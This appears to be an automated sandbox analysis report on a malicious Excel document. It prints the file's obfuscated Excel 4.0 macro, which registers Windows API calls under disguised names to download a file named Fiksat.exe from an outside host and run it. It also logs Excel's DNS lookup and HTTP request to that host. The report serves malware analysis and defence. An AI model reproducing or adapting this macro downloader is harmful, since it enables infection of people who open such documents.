    Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

    Macro 4.0 Code

    "=REGISTER(Live!Y204,B684,Live!Y206,Live!Y207,,Live!Y208,Live!Y209)","=CONCATENATE(""C"",""reateDirectoryA"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=Volate(Live!Y210,Live!Y211)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=Volate(""C:\Gravity\Gravity2"",Live!Y211)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(Live!Z204,Live!Z205,Live!Z206,Live!Z207,,Live!Z208,Live!Z209)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=DFGYUJTYGSRYHEDRTSDGS(0,A697&Live!A310&A696&Live!A300,""C:\Gravity\Gravity2\Fiksat.exe"",0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(""zipfldr"",""RouteTheCall"",""JJCCJ"",""GFJVHYXDYHDTYHXDYHDTY"",,1,9)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=GFJVHYXDYHDTYHXDYHDTY(0,""calc"",""C:\Gravity\Gravity2\Fiksat.exe"",0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=?????????(111111,9999999)&"".""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 20, 2020 20:55:32.360158920 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:55:32.545371056 CET8049165103.253.212.59192.168.2.22
    Nov 20, 2020 20:55:32.545615911 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:55:32.546956062 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:55:32.732038021 CET8049165103.253.212.59192.168.2.22
    Nov 20, 2020 20:55:33.144804001 CET8049165103.253.212.59192.168.2.22
    Nov 20, 2020 20:55:33.145180941 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:55:44.693747044 CET8049165103.253.212.59192.168.2.22
    Nov 20, 2020 20:55:44.694098949 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:57:32.104588985 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:57:32.602775097 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:57:33.569986105 CET4916580192.168.2.22103.253.212.59
    Nov 20, 2020 20:57:35.488939047 CET4916580192.168.2.22103.253.212.59

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 20, 2020 20:55:32.156871080 CET5219753192.168.2.228.8.8.8
    Nov 20, 2020 20:55:32.338742018 CET53521978.8.8.8192.168.2.22

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Nov 20, 2020 20:55:32.156871080 CET192.168.2.228.8.8.80x315eStandard query (0)int.boogieapparel.co.idA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Nov 20, 2020 20:55:32.338742018 CET8.8.8.8192.168.2.220x315eNo error (0)int.boogieapparel.co.id103.253.212.59A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • int.boogieapparel.co.id

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249165103.253.212.5980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Nov 20, 2020 20:55:32.546956062 CET0OUTGET /jvkuykqpn/4574557.png HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: int.boogieapparel.co.id
    Connection: Keep-Alive
    Nov 20, 2020 20:55:33.144804001 CET1INHTTP/1.1 200 OK
    X-Powered-By: PHP/7.3.6
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Date: Fri, 20 Nov 2020 19:55:33 GMT
    Server: LiteSpeed
    X-Powered-By: PleskLin
    Connection: Keep-Alive


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    General

    Start time:20:55:37
    Start date:20/11/2020
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13f500000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >